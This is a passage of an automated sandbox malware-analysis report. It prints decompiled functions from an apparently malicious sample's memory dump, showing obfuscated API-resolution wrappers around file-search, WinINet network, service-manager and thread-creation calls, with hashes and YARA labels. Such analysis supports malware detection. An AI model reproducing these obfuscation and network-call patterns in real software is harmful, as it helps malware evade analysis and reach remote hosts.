				_v12 = _v12 ^ 0xfe7a3202;
				E00E92309(0x2de, __ecx, __ecx, 0xa7d3fbc8, __ecx, 0x9c9047d0);
				_t47 = FindNextFileW(_t51, _a4); // executed
				return _t47;
			}

0x00eae9ef
0x00eae9f2
0x00eae9f4
0x00eae9f7
0x00eae9fa
0x00eae9fe
0x00eae9ff
0x00eaea04
0x00eaea0b
0x00eaea12
0x00eaea19
0x00eaea30
0x00eaea33
0x00eaea3a
0x00eaea41
0x00eaea48
0x00eaea4f
0x00eaea56
0x00eaea5d
0x00eaea64
0x00eaea6b
0x00eaea72
0x00eaea79
0x00eaea80
0x00eaea99
0x00eaeaa5
0x00eaeaab

APIs

FindNextFileW.KERNELBASE(00000000,FE7A3202,?,?,?,?,?,?,?,?,?,?,00000072), ref: 00EAEAA5

Strings

$w2, xrefs: 00EAEA4F
A, xrefs: 00EAEA12

Memory Dump Source

Source File: 00000010.00000002.868241102.0000000000E90000.00000040.00000001.sdmp, Offset: 00E90000, based on PE: true

Similarity

API ID: FileFindNext
String ID: $w2$A
API String ID: 2029273394-2068021171
Opcode ID: 489ae82eb01001db2e27a8813198e8620566e78ec9ea4fd3dbf43d66dbc97652
Instruction ID: 433b46ce748187d53380766c0566a33d902161db456f88fe0ddf3491e1fdf238
Opcode Fuzzy Hash: 489ae82eb01001db2e27a8813198e8620566e78ec9ea4fd3dbf43d66dbc97652
Instruction Fuzzy Hash: DA11DDB1C0121DABCF15DFE8DA068AEBFB4FB44300F148589E915B6260E3B55B249FA5

Uniqueness

Uniqueness Score: -1.00%

Function 00E98A5E, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 68
networkCOMMON

Download Yara Rule

C-Code - Quality: 47%

			E00E98A5E(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, long _a24, WCHAR* _a36, intOrPtr _a44, intOrPtr _a48, intOrPtr _a52, WCHAR* _a56) {
				signed int _v8;
				signed int _v12;
				unsigned int _v16;
				signed int _v20;
				WCHAR* _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				void* _t45;
				void* _t52;
				void* _t57;

				_push(_a56);
				_t57 = __edx;
				_push(_a52);
				_push(_a48);
				_push(_a44);
				_push(0);
				_push(_a36);
				_push(0);
				_push(0);
				_push(_a24);
				_push(0);
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E00EB2523(_t45);
				_v32 = 0xd5d112;
				_v28 = 0x50513d;
				_v24 = 0;
				_v12 = 0x46c43;
				_v12 = _v12 + 0xffffdfef;
				_v12 = _v12 | 0x9d8b3e1d;
				_v12 = _v12 ^ 0x9d8347af;
				_v20 = 0x816eb9;
				_v20 = _v20 + 0xffff29e2;
				_v20 = _v20 ^ 0x0080c9d8;
				_v8 = 0x807982;
				_v8 = _v8 | 0x5015719e;
				_v8 = _v8 ^ 0xfbfa9e2f;
				_v8 = _v8 ^ 0xab6f9dce;
				_v16 = 0xec1576;
				_v16 = _v16 >> 0xb;
				_v16 = _v16 ^ 0x000e8763;
				E00E92309(0x18c, __ecx, __ecx, 0xb50c381d, __ecx, 0xc0cf1a4);
				_t52 = HttpOpenRequestW(_t57, _a36, _a56, 0, 0, 0, _a24, 0); // executed
				return _t52;
			}

0x00e98a66
0x00e98a6b
0x00e98a6d
0x00e98a70
0x00e98a73
0x00e98a76
0x00e98a77
0x00e98a7a
0x00e98a7b
0x00e98a7c
0x00e98a7f
0x00e98a80
0x00e98a83
0x00e98a86
0x00e98a89
0x00e98a8c
0x00e98a8d
0x00e98a8e
0x00e98a93
0x00e98a9d
0x00e98aa4
0x00e98aa7
0x00e98aae
0x00e98ab5
0x00e98abc
0x00e98ac3
0x00e98aca
0x00e98ad1
0x00e98ad8
0x00e98adf
0x00e98ae6
0x00e98aed
0x00e98af4
0x00e98afb
0x00e98aff
0x00e98b24
0x00e98b3a
0x00e98b41

APIs

HttpOpenRequestW.WININET(?,?,?,00000000,00000000,00000000,00D5D112,00000000), ref: 00E98B3A

Strings

=QP, xrefs: 00E98A9D

Memory Dump Source

Source File: 00000010.00000002.868241102.0000000000E90000.00000040.00000001.sdmp, Offset: 00E90000, based on PE: true

Similarity

API ID: HttpOpenRequest
String ID: =QP
API String ID: 1984915467-456757808
Opcode ID: 4cc3d4786cdcc23149290c3469cd4bf7c683ba33055c948049ab044fbc38bf75
Instruction ID: 85fe36afc7787a9c2b21b1cb3076494e48b0e1afff9e0c82619d3aad52b93f0e
Opcode Fuzzy Hash: 4cc3d4786cdcc23149290c3469cd4bf7c683ba33055c948049ab044fbc38bf75
Instruction Fuzzy Hash: DC21F0B2801209BB8F559F95CC4ACDFBFB9EF85700F109148BA14A6220D3B18A65DFA1

Uniqueness

Uniqueness Score: -1.00%

Function 00EA42E4, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 66
memoryCOMMON

Download Yara Rule

C-Code - Quality: 73%

			E00EA42E4(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a16, intOrPtr _a20) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				long _v24;
				long _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				void* _t43;
				char _t54;
				signed int _t57;
				void* _t62;
				void* _t63;

				_push(_a20);
				_t62 = __edx;
				_push(_a16);
				_t63 = __ecx;
				_push(0);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E00EB2523(_t43);
				_v36 = 0xead706;
				_v32 = 0x8aaadf;
				_v28 = 0;
				_v24 = 0;
				_v12 = 0x3b6f9b;
				_t57 = 0x3f;
				_v12 = _v12 * 0xe;
				_v12 = _v12 << 0x10;
				_v12 = _v12 ^ 0x1a7fe3f0;
				_v20 = 0x6318b1;
				_v20 = _v20 | 0x2b2fc1f2;
				_v20 = _v20 ^ 0x2b6f417a;
				_v8 = 0xeb56a2;
				_v8 = _v8 << 1;
				_v8 = _v8 / _t57;
				_v8 = _v8 * 0x2f;
				_v8 = _v8 ^ 0x015d5ff9;
				_v16 = 0x2619ef;
				_v16 = _v16 << 6;
				_v16 = _v16 ^ 0x098e35d6;
				E00E92309(_t57 + 0x4d, _t57, _t57, 0x52f9059f, _t57, 0x9c9047d0);
				_t54 = RtlFreeHeap(_t62, 0, _t63); // executed
				return _t54;
			}

0x00ea42ed
0x00ea42f2
0x00ea42f4
0x00ea42f7
0x00ea42f9
0x00ea42fa
0x00ea42fd
0x00ea4300
0x00ea4301
0x00ea4302
0x00ea4307
0x00ea4311
0x00ea431a
0x00ea431d
0x00ea4320
0x00ea432d
0x00ea4334
0x00ea4337
0x00ea433b
0x00ea4342
0x00ea4349
0x00ea4350
0x00ea4357
0x00ea435e
0x00ea436b
0x00ea4377
0x00ea437a
0x00ea4381
0x00ea4388
0x00ea438c
0x00ea439f
0x00ea43aa
0x00ea43b2

APIs

RtlFreeHeap.NTDLL(00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,072B1AC5,00000000,00000000), ref: 00EA43AA

Strings

zAo+, xrefs: 00EA4350

Memory Dump Source

Source File: 00000010.00000002.868241102.0000000000E90000.00000040.00000001.sdmp, Offset: 00E90000, based on PE: true

Similarity

API ID: FreeHeap
String ID: zAo+
API String ID: 3298025750-440923707
Opcode ID: 782d704bb29470d0423d04c6355d4fda0cb05a54fe280a973ff5c90c0f5ad215
Instruction ID: 419dbd72458e3bd7c752c8ccfb190fbb9bb330e74802bd85f2eeb0f2bc230982
Opcode Fuzzy Hash: 782d704bb29470d0423d04c6355d4fda0cb05a54fe280a973ff5c90c0f5ad215
Instruction Fuzzy Hash: 382116B1D01219BB9B08DF99D98A8EEBBB9FB44344F508199E515A7240D3B05B149B90

Uniqueness

Uniqueness Score: -1.00%

Function 00E9F2CC, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 57
networkCOMMON

Download Yara Rule

C-Code - Quality: 24%

			E00E9F2CC(void* __edx, intOrPtr _a4, intOrPtr _a8, long _a12, intOrPtr _a32) {
				unsigned int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				WCHAR* _v24;
				intOrPtr _v28;
				void* __ecx;
				void* _t36;
				void* _t44;
				void* _t46;

				_push(_a32);
				_push(0);
				_push(0);
				_push(0);
				_push(0);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				E00EB2523(_t36);
				_v28 = 0x481ca4;
				_v24 = 0;
				_v20 = 0xca1952;
				_v20 = _v20 ^ 0x1684c8f8;
				_v20 = _v20 ^ 0x16482d99;
				_v12 = 0xc193bc;
				_v12 = _v12 ^ 0x27e4a297;
				_v12 = _v12 | 0xa7673761;
				_v12 = _v12 ^ 0xa76f04da;
				_v8 = 0xc5b902;
				_push(0xc0cf1a4);
				_push(_t45);
				_push(0xb325898b);
				_push(_t45);
				_v8 = _v8 * 0x4e;
				_v8 = _v8 >> 4;
				_v8 = _v8 ^ 0x03c56f69;
				_v16 = 0x24ec4f;
				_v16 = _v16 + 0xffffc13d;
				_v16 = _v16 ^ 0x002fbbc3;
				_push(_t45);
				_t46 = 0x50;
				E00E92309(_t46);
				_t44 = InternetOpenW(0, _a12, 0, 0, 0); // executed
				return _t44;
			}

0x00e9f2d3
0x00e9f2d8
0x00e9f2d9
0x00e9f2da
0x00e9f2db
0x00e9f2dc
0x00e9f2df
0x00e9f2e2
0x00e9f2e7
0x00e9f2ec
0x00e9f2f6
0x00e9f2f9
0x00e9f300
0x00e9f307
0x00e9f30e
0x00e9f315
0x00e9f31c
0x00e9f323
0x00e9f32a
0x00e9f335
0x00e9f33a
0x00e9f33b
0x00e9f340
0x00e9f341
0x00e9f344
0x00e9f348
0x00e9f34f
0x00e9f356
0x00e9f35d
0x00e9f370
0x00e9f373
0x00e9f374
0x00e9f383
0x00e9f389

APIs

InternetOpenW.WININET(00000000,16482D99,00000000,00000000,00000000), ref: 00E9F383

Strings

O$, xrefs: 00E9F34F

Memory Dump Source

Source File: 00000010.00000002.868241102.0000000000E90000.00000040.00000001.sdmp, Offset: 00E90000, based on PE: true

Similarity

API ID: InternetOpen
String ID: O$
API String ID: 2038078732-838329570
Opcode ID: bfd598ea9fc20005dd18c51756325e876dca57c81b5a8b40325e3a3f8c113345
Instruction ID: df323fb949a2e10c73ada02363922575a00e8815b2999059fc19c158e16ea469
Opcode Fuzzy Hash: bfd598ea9fc20005dd18c51756325e876dca57c81b5a8b40325e3a3f8c113345
Instruction Fuzzy Hash: 061113B1C0221DBB8F15DFA58C4A8DFBFB8EF05754F108589F914B6110C3B15A54DBA1

Uniqueness

Uniqueness Score: -1.00%

Function 00E9E0A2, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 56COMMON

Download Yara Rule

APIs

GetNativeSystemInfo.KERNEL32 ref: 00E9E168

Strings

|p, xrefs: 00E9E0FA

Memory Dump Source

Source File: 00000010.00000002.868241102.0000000000E90000.00000040.00000001.sdmp, Offset: 00E90000, based on PE: true

Similarity

API ID: InfoNativeSystem
String ID: |p
API String ID: 1721193555-2455131449
Opcode ID: 1373000f67fd09352ab480020baae7fa00b59f1f2ab89e5c019d1be64afd4c0b
Instruction ID: b1f89de3acec8842285ea969fc4000601990cf43db0c1e60df9cdda999ebf5d9
Opcode Fuzzy Hash: 1373000f67fd09352ab480020baae7fa00b59f1f2ab89e5c019d1be64afd4c0b
Instruction Fuzzy Hash: C52134B6D00309EFDB48DFA4C84A8EEBBB4FB44310F108599E415AA291E3B85B508F91

Uniqueness

Uniqueness Score: -1.00%

Function 00EAFE9D, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 50
COMMON

Download Yara Rule

C-Code - Quality: 26%

			E00EAFE9D(void* __edx, intOrPtr _a4, intOrPtr _a8, int _a16) {
				unsigned int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				short* _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				void* __ecx;
				void* _t34;
				void* _t41;
				void* _t43;

				_push(_a16);
				_push(0);
				_push(_a8);
				_push(_a4);
				_push(0);
				E00EB2523(_t34);
				_v32 = 0xfebeef;
				_v28 = 0x6b4d4f;
				_v24 = 0;
				_v20 = 0x72d4d3;
				_v20 = _v20 + 0x7ce2;
				_v20 = _v20 ^ 0x0072d8bc;
				_v16 = 0x618a6;
				_v16 = _v16 + 0x2ac;
				_v16 = _v16 ^ 0x00083b16;
				_v12 = 0x17740f;
				_v12 = _v12 + 0x9d82;
				_v12 = _v12 ^ 0x0012bdfc;
				_v8 = 0xba692b;
				_v8 = _v8 ^ 0x31422697;
				_v8 = _v8 >> 0x10;
				_v8 = _v8 ^ 0x0005552e;
				_push(0x21ce39be);
				_push(0xb53dc03);
				_push(_t42);
				_push(_t42);
				_t43 = 0x15;
				E00E92309(_t43);
				_t41 = OpenSCManagerW(0, 0, _a16); // executed
				return _t41;
			}

0x00eafea4
0x00eafea9
0x00eafeaa
0x00eafead
0x00eafeb1
0x00eafeb2
0x00eafeb7
0x00eafec1
0x00eafec8
0x00eafecb
0x00eafed2
0x00eafed9
0x00eafee0
0x00eafee7
0x00eafeee
0x00eafef5
0x00eafefc
0x00eaff03
0x00eaff0a
0x00eaff11
0x00eaff18
0x00eaff1c
0x00eaff2f
0x00eaff35
0x00eaff3a
0x00eaff3b
0x00eaff3e
0x00eaff3f
0x00eaff4c
0x00eaff52

APIs

OpenSCManagerW.ADVAPI32(00000000,00000000,00EA5191,?,?,?,?,?,?,?,?,?,?,0EB411AB), ref: 00EAFF4C

Strings

OMk, xrefs: 00EAFEC1

Memory Dump Source

Source File: 00000010.00000002.868241102.0000000000E90000.00000040.00000001.sdmp, Offset: 00E90000, based on PE: true

Similarity

API ID: ManagerOpen
String ID: OMk
API String ID: 1889721586-456170103
Opcode ID: d1e283b7febcfdf4bdf6f7a65a9942aadab0ed956acd7b7642cec6b73cd3d803
Instruction ID: d2929135be626bfd9584fafe72c970a4952dbaea54116551d0290d99a6e210fb
Opcode Fuzzy Hash: d1e283b7febcfdf4bdf6f7a65a9942aadab0ed956acd7b7642cec6b73cd3d803
Instruction Fuzzy Hash: C61113B2C0121CBBDB11EFA5D90A8EFBFB4EF44318F108088E91466201D3B95B149B91

Uniqueness

Uniqueness Score: -1.00%

Function 00EA199D, Relevance: 1.6, APIs: 1, Instructions: 71
fileCOMMON

Download Yara Rule

C-Code - Quality: 58%

			E00EA199D(void* __edx, WCHAR* _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, long _a20, long _a24, long _a28, long _a32, intOrPtr _a36) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				void* _t55;
				void* _t68;
				signed int _t69;
				signed int _t70;

				_push(0);
				_push(_a36);
				_push(_a32);
				_push(_a28);
				_push(_a24);
				_push(_a20);
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(0);
				E00EB2523(_t55);
				_v12 = 0xd4f63c;
				_v12 = _v12 >> 7;
				_v12 = _v12 << 0xf;
				_v12 = _v12 + 0xffffff46;
				_v12 = _v12 ^ 0xd4fb5fe8;
				_v8 = 0x967d18;
				_v8 = _v8 + 0xffffef98;
				_t69 = 0x14;
				_v8 = _v8 / _t69;
				_t70 = 0x4a;
				_v8 = _v8 / _t70;
				_v8 = _v8 ^ 0x000a0722;
				_v20 = 0x4653bc;
				_v20 = _v20 * 0x70;
				_v20 = _v20 ^ 0x1ec2604c;
				_v16 = 0x7577a9;
				_v16 = _v16 * 0x3c;
				_v16 = _v16 ^ 0x1b87e59a;
				E00E92309(0x10a, _t70, _t70, 0xb484d458, _t70, 0x9c9047d0);
				_t68 = CreateFileW(_a4, _a24, _a28, 0, _a32, _a20, 0); // executed
				return _t68;
			}

0x00ea19a6
0x00ea19a7
0x00ea19aa
0x00ea19ad
0x00ea19b0
0x00ea19b3
0x00ea19b6
0x00ea19b9
0x00ea19bc
0x00ea19bf
0x00ea19c3
0x00ea19c4
0x00ea19c9
0x00ea19d3
0x00ea19d9
0x00ea19dd
0x00ea19e4
0x00ea19eb
0x00ea19f2
0x00ea19fe
0x00ea1a03
0x00ea1a0b
0x00ea1a13
0x00ea1a16
0x00ea1a1d
0x00ea1a30
0x00ea1a38
0x00ea1a3f
0x00ea1a4a
0x00ea1a4d
0x00ea1a60
0x00ea1a79
0x00ea1a7f

APIs

CreateFileW.KERNEL32(?,?,?,00000000,?,?,00000000), ref: 00EA1A79

Memory Dump Source

Source File: 00000010.00000002.868241102.0000000000E90000.00000040.00000001.sdmp, Offset: 00E90000, based on PE: true

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 8a2d25935346c61c613306e80470cb2899605f47af9ce82126dccb95390cfdca
Instruction ID: df0fa5deaa1fa645e437125a3d438cd6751ed2de20f8ed64aece7b1722b2cf89
Opcode Fuzzy Hash: 8a2d25935346c61c613306e80470cb2899605f47af9ce82126dccb95390cfdca
Instruction Fuzzy Hash: 5C21E27280021DBBDF05DF95D8098DEBFB6EF49354F108188FA1466260D3B69A61AF90

Uniqueness

Uniqueness Score: -1.00%

Function 00EB30FB, Relevance: 1.6, APIs: 1, Instructions: 70
networkCOMMON

Download Yara Rule

C-Code - Quality: 50%

			E00EB30FB(WCHAR* _a4, intOrPtr _a8, intOrPtr _a12, long _a16, intOrPtr _a20, void* _a24, intOrPtr _a32, intOrPtr _a36, signed int _a40, intOrPtr _a48) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				void* _t57;
				signed int _t58;
				short _t63;

				_t63 = _a40;
				_push(_a48);
				_push(0);
				_push(_t63 & 0x0000ffff);
				_push(_a36);
				_push(_a32);
				_push(0);
				_push(_a24);
				_push(_a20);
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(0);
				_push(0);
				E00EB2523(_t63 & 0x0000ffff);
				_a40 = 0x441dde;
				_a40 = _a40 | 0xef6c71fd;
				_a40 = _a40 + 0xffff46ca;
				_a40 = _a40 ^ 0xef65f1b7;
				_v16 = 0x4e992b;
				_v16 = _v16 << 0xe;
				_v16 = _v16 ^ 0xa64ff1a5;
				_v12 = 0xdc7938;
				_t58 = 0x71;
				_v12 = _v12 / _t58;
				_v12 = _v12 << 5;
				_v12 = _v12 ^ 0x00369a6d;
				_v8 = 0xc2c26;
				_v8 = _v8 << 7;
				_v8 = _v8 << 3;
				_v8 = _v8 ^ 0x30b97202;
				E00E92309(0x185, _t58, _t58, 0x3cfe7f69, _t58, 0xc0cf1a4);
				_t57 = InternetConnectW(_a24, _a4, _t63, 0, 0, _a16, 0, 0); // executed
				return _t57;
			}

0x00eb3102
0x00eb3106
0x00eb310e
0x00eb310f
0x00eb3110
0x00eb3113
0x00eb3116
0x00eb3117
0x00eb311a
0x00eb311d
0x00eb3120
0x00eb3123
0x00eb3126
0x00eb3129
0x00eb312a
0x00eb312b
0x00eb3130
0x00eb313a
0x00eb3143
0x00eb314a
0x00eb3151
0x00eb3158
0x00eb315c
0x00eb3163
0x00eb316f
0x00eb3177
0x00eb317a
0x00eb317e
0x00eb3185
0x00eb318c
0x00eb3190
0x00eb3194
0x00eb31b4
0x00eb31ca
0x00eb31d1

APIs

InternetConnectW.WININET(?,00369A6D,?,00000000,00000000,?,00000000,00000000), ref: 00EB31CA

Memory Dump Source

Source File: 00000010.00000002.868241102.0000000000E90000.00000040.00000001.sdmp, Offset: 00E90000, based on PE: true

Similarity

API ID: ConnectInternet
String ID:
API String ID: 3050416762-0
Opcode ID: a94079c84f44fd79cf2d8e21410448fccbf556cf6765277f06ac4260a9b0b9f5
Instruction ID: 8acc84d44eb01c99d5750bef034bf16bbfaa7e2d3edb46360bac063d258e81c4
Opcode Fuzzy Hash: a94079c84f44fd79cf2d8e21410448fccbf556cf6765277f06ac4260a9b0b9f5
Instruction Fuzzy Hash: 42213976900108BBDF01CFA6CC49CDFBFB9EB89704F008149F91466220C3759A20DFA1

Uniqueness

Uniqueness Score: -1.00%

Function 00EA38CA, Relevance: 1.6, APIs: 1, Instructions: 63
threadCOMMON

Download Yara Rule

C-Code - Quality: 55%

			E00EA38CA(void* __ecx, intOrPtr _a8, _Unknown_base(*)()* _a12, void* _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a32, intOrPtr _a40) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				void* _t44;
				void* _t54;
				signed int _t56;

				_push(_a40);
				_push(0);
				_push(_a32);
				_push(0);
				_push(_a24);
				_push(_a20);
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(0);
				_push(0);
				E00EB2523(_t44);
				_v8 = 0x81d8e3;
				_v8 = _v8 | 0x29cc6377;
				_t56 = 0x4e;
				_v8 = _v8 / _t56;
				_v8 = _v8 + 0xffff28cb;
				_v8 = _v8 ^ 0x008a8115;
				_v20 = 0x37a592;
				_v20 = _v20 | 0x4431b854;
				_v20 = _v20 ^ 0x44318d0b;
				_v16 = 0x83d7ad;
				_v16 = _v16 | 0x0c5d9c08;
				_v16 = _v16 ^ 0x0cde7e94;
				_v12 = 0xac61ec;
				_v12 = _v12 + 0xffff443d;
				_v12 = _v12 * 0x13;
				_v12 = _v12 ^ 0x0cbd13a0;
				E00E92309(0x347, _t56, _t56, 0x49f4d21, _t56, 0x9c9047d0);
				_t54 = CreateThread(0, 0, _a12, _a16, 0, 0); // executed
				return _t54;
			}

0x00ea38d1
0x00ea38d6
0x00ea38d7
0x00ea38da
0x00ea38db
0x00ea38de
0x00ea38e1
0x00ea38e4
0x00ea38e7
0x00ea38ea
0x00ea38eb
0x00ea38ed
0x00ea38f2
0x00ea38fc
0x00ea390a
0x00ea3912
0x00ea3915
0x00ea391c
0x00ea3923
0x00ea392a
0x00ea3931
0x00ea3938
0x00ea393f
0x00ea3946
0x00ea394d
0x00ea3954
0x00ea3967
0x00ea396f
0x00ea3982
0x00ea3994
0x00ea399a

APIs

CreateThread.KERNEL32(00000000,00000000,44318D0B,?,00000000,00000000), ref: 00EA3994

Memory Dump Source

Source File: 00000010.00000002.868241102.0000000000E90000.00000040.00000001.sdmp, Offset: 00E90000, based on PE: true

Similarity

API ID: CreateThread
String ID:
API String ID: 2422867632-0
Opcode ID: 4ee66b657200ea8511f1b49f91465a58aa226465ce330f2d495d8e9b8aa70771
Instruction ID: 51c3f63d3e8a37f1553c64eab24d27fefa987788314a1b2b0c469bc83095dc03
Opcode Fuzzy Hash: 4ee66b657200ea8511f1b49f91465a58aa226465ce330f2d495d8e9b8aa70771
Instruction Fuzzy Hash: FB21E271801219BBCF15DFE9DD4A8DFBFB9FF09214F108188F918A6120D3B19A249FA1

Uniqueness

Uniqueness Score: -1.00%

Function 00E92985, Relevance: 1.6, APIs: 1, Instructions: 58
memoryCOMMON

Download Yara Rule

C-Code - Quality: 78%

			E00E92985(long __ecx, long __edx, intOrPtr _a4, void* _a8, intOrPtr _a12) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				unsigned int _v20;
				void* _t43;
				void* _t53;
				signed int _t55;
				long _t60;
				long _t61;

				_push(_a12);
				_t60 = __edx;
				_t61 = __ecx;
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E00EB2523(_t43);
				_v20 = 0x610f25;
				_v20 = _v20 ^ 0x98bdb346;
				_v20 = _v20 >> 3;
				_v20 = _v20 ^ 0x13199c72;
				_v16 = 0x24641b;
				_t55 = 0x72;
				_v16 = _v16 * 0x35;
				_v16 = _v16 ^ 0xfebd96de;
				_v16 = _v16 ^ 0xf931a9e3;
				_v12 = 0x6331a9;
				_v12 = _v12 >> 0xb;
				_v12 = _v12 / _t55;
				_v12 = _v12 ^ 0x0006f398;
				_v8 = 0x8145a8;
				_v8 = _v8 >> 0xa;
				_v8 = _v8 << 0xd;
				_v8 = _v8 + 0x8268;
				_v8 = _v8 ^ 0x0405b518;
				E00E92309(_t55 + 0x5d, _t55, _t55, 0x9d19c04e, _t55, 0x9c9047d0);
				_t53 = RtlAllocateHeap(_a8, _t60, _t61); // executed
				return _t53;
			}

0x00e9298d
0x00e92990
0x00e92992
0x00e92994
0x00e92997
0x00e9299a
0x00e9299b
0x00e9299c
0x00e929a1
0x00e929ab
0x00e929b4
0x00e929b8
0x00e929bf
0x00e929cc
0x00e929d3
0x00e929d6
0x00e929dd
0x00e929e4
0x00e929eb
0x00e929f9
0x00e929fc
0x00e92a03
0x00e92a0a
0x00e92a0e
0x00e92a12
0x00e92a19
0x00e92a31
0x00e92a3e
0x00e92a45

APIs

RtlAllocateHeap.NTDLL(F931A9E3,01AD2A76,65B9EDAF,?,?,?,?,?,?,?,?,00000000,229292B5), ref: 00E92A3E

Memory Dump Source

Source File: 00000010.00000002.868241102.0000000000E90000.00000040.00000001.sdmp, Offset: 00E90000, based on PE: true

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 138a33bbf657fc90b6a1f11ed01e494c992cf007267dd6aff1ee16601a01d635
Instruction ID: 862a2f543c37e8c1e320d7b1dd15c43f698a052d2dc2ea5758fc10624d7c69de
Opcode Fuzzy Hash: 138a33bbf657fc90b6a1f11ed01e494c992cf007267dd6aff1ee16601a01d635
Instruction Fuzzy Hash: C4213372D00209BBDF18DFA9D84A8DEBFB5FF41714F108098E825A6210E3B4AB55DF90

Uniqueness

Uniqueness Score: -1.00%

Function 00EA7708, Relevance: 1.6, APIs: 1, Instructions: 53libraryCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,00000000), ref: 00EA77B6

Memory Dump Source

Source File: 00000010.00000002.868241102.0000000000E90000.00000040.00000001.sdmp, Offset: 00E90000, based on PE: true

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 793664888eb73d009d9e5b6ba31e7172053ff3348b2e2b85015c814eee7fae41
Instruction ID: 51d8e0f9724388a7b962cf99d430a8e1f761c358e9719d34a4c1863afeacae4b
Opcode Fuzzy Hash: 793664888eb73d009d9e5b6ba31e7172053ff3348b2e2b85015c814eee7fae41
Instruction Fuzzy Hash: 161134B2D00209BBDF18DFA4C94A9EEBBB4FF44304F108189E914AB251E3B09B108F91

Uniqueness

Uniqueness Score: -1.00%

Function 00EAA566, Relevance: 1.5, APIs: 1, Instructions: 40
COMMON

Download Yara Rule

C-Code - Quality: 87%

			E00EAA566(void* __ecx, void* __edx, void* _a4) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				void* _t31;
				int _t39;

				_push(_a4);
				_push(__ecx);
				E00EB2523(_t31);
				_v20 = 0xa80c31;
				_v20 = _v20 * 0x6c;
				_v20 = _v20 ^ 0x46e6f799;
				_v16 = 0x35d7e6;
				_v16 = _v16 << 0xd;
				_v16 = _v16 ^ 0xbafefac0;
				_v12 = 0x55f9ae;
				_v12 = _v12 + 0xffffbfa6;
				_v12 = _v12 | 0xf8d2795e;
				_v12 = _v12 ^ 0xf8daa7f9;
				_v8 = 0xe46cfe;
				_v8 = _v8 ^ 0xeb94df75;
				_v8 = _v8 | 0xf69b0666;
				_v8 = _v8 ^ 0xfffa92dc;
				E00E92309(0x148, __ecx, __ecx, 0x2237d547, __ecx, 0x9c9047d0);
				_t39 = FindCloseChangeNotification(_a4); // executed
				return _t39;
			}

0x00eaa56c
0x00eaa570
0x00eaa571
0x00eaa576
0x00eaa58a
0x00eaa58d
0x00eaa594
0x00eaa59b
0x00eaa59f
0x00eaa5a6
0x00eaa5ad
0x00eaa5b4
0x00eaa5bb
0x00eaa5c2
0x00eaa5c9
0x00eaa5d0
0x00eaa5d7
0x00eaa5f6
0x00eaa601
0x00eaa606

APIs

FindCloseChangeNotification.KERNEL32(F8DAA7F9), ref: 00EAA601

Memory Dump Source

Source File: 00000010.00000002.868241102.0000000000E90000.00000040.00000001.sdmp, Offset: 00E90000, based on PE: true

Similarity

API ID: ChangeCloseFindNotification
String ID:
API String ID: 2591292051-0
Opcode ID: 2512bc8cf98a9556459c8d1695ff192ee3e01f460f93b2f36ca59e351fe401b9
Instruction ID: 0790fca076c694e6eac596d7463b05c436906f036461c9c310b973f8f8466b6d
Opcode Fuzzy Hash: 2512bc8cf98a9556459c8d1695ff192ee3e01f460f93b2f36ca59e351fe401b9
Instruction Fuzzy Hash: 1611F7B5C1030DFBCF18DFE8D84699EBBB4EF44304F108598A855A6261D3756B158F91

Uniqueness

Uniqueness Score: -1.00%

Function 00EA17CB, Relevance: 1.3, APIs: 1, Instructions: 56
stringCOMMON

Download Yara Rule

C-Code - Quality: 86%

			E00EA17CB(WCHAR* __ecx, void* __edx, intOrPtr _a4, WCHAR* _a8) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				void* _t44;
				int _t55;
				signed int _t57;
				WCHAR* _t62;

				_push(_a8);
				_t62 = __ecx;
				_push(_a4);
				_push(__ecx);
				E00EB2523(_t44);
				_v24 = _v24 & 0x00000000;
				_v32 = 0x2c5dd9;
				_v28 = 0x29a411;
				_v16 = 0xb6013c;
				_v16 = _v16 >> 2;
				_v16 = _v16 << 5;
				_v16 = _v16 ^ 0x05bceb0d;
				_v12 = 0xa7496a;
				_t57 = 7;
				_v12 = _v12 * 0x55;
				_v12 = _v12 | 0x1a205192;
				_v12 = _v12 ^ 0x3fab9f8f;
				_v8 = 0xf5055a;
				_v8 = _v8 / _t57;
				_v8 = _v8 + 0xa16;
				_v8 = _v8 * 0x7e;
				_v8 = _v8 ^ 0x1132ba81;
				_v20 = 0xaea409;
				_v20 = _v20 << 6;
				_v20 = _v20 ^ 0x2ba3ef66;
				E00E92309(0xb8, _t57, _t57, 0xbf157248, _t57, 0x9c9047d0);
				_t55 = lstrcmpiW(_t62, _a8); // executed
